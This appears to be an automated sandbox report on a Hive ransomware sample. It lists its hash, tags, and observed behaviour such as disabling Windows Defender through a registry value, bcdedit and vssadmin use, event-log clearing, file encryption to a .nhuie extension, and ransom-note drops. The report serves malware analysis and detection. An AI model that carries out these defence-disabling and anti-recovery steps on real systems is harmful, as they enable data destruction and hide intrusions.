Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-q5p7zscgem
Target 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample
SHA256 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402

Threat Level: Known bad

The file 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Deletes Windows Defender Definitions

Modifies security service

Hive

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Deletes shadow copies

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs net.exe

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 13:50

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 13:50

Reported

2022-01-12 13:53

Platform

win10-en-20211208

Max time kernel

125s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\InvokeFormat.crw => C:\Users\Admin\Pictures\InvokeFormat.crw.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ihJ4ov1Pkhk0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\InvokeFormat.crw.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ihJ4ov1Pkhk0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File renamed C:\Users\Admin\Pictures\PublishInstall.png => C:\Users\Admin\Pictures\PublishInstall.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_U449wDxsqv40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\PublishInstall.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_U449wDxsqv40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\en-GB.Messaging.config C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-white\WideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\offsym.ttf C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jawt.h.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_UVyn7Mm4GMk0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ZH-CN.respack C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\11c.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-white_scale-200.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_yeXTfF7BzeE0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_cPbqgL76v_w0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\MedTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\8Axs_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessEntry2019R_PrepidBypass-ul-oob.xrm-ms.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_rbOb8yfpR8w0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_contrast-black.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-150_contrast-black.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\ui-strings.js.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_tXn9_RTkT240.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\8Axs_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\loc\AppXManifestLoc.16.en-us.xml.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_2O-2Ij_ntAU0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\CoreEngine\Data\3DBrush\round.obj C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\XMLOffKeys\Keys_OffVer11.xml C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\DC_HolderEarned.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\en-US.Calendar.model C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_X2wL5kDaBzA0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\particles.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\LargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\move.svg.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_MHnC96WEbYg0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_nzUSar87l7U0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaSansRegular.ttf.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_pFR13AOgdM40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\SampleHeader\news.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\Microsoft.Skype.ImageTool.winmd C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\8Axs_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-actions.jar.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_l9BsL1jRBfg0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_zowWnw_AT7U0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Density_Selected_Hollow.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Heart_Shape.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\en-us\styles\wefgallerywinrt.css C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-16.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_selected_18.svg.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_HGilvL9AJ7k0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_G9ruX2evewQ0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Retail-ul-phn.xrm-ms.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ZlgMA-MVcU40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\5601_20x20x32.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_RoN1SH2G1Dc0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosAppList.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-200_contrast-high.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ugPIFS3k0dg0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\COPYRIGHT.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_9QbfGGwxMIM0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ul.xrm-ms.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_W4NVptDxCso0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-200.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\InkObj.dll.mui.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_k7BGafsBEMI0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\LockScreenLogo.scale-125.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\HeroAppTile.xml C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\ui-strings.js.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_pYDiTllFkqA0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_UtqH2eQYL340.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Resources\TopicPage\core.js C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_Lw1hbv692II0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
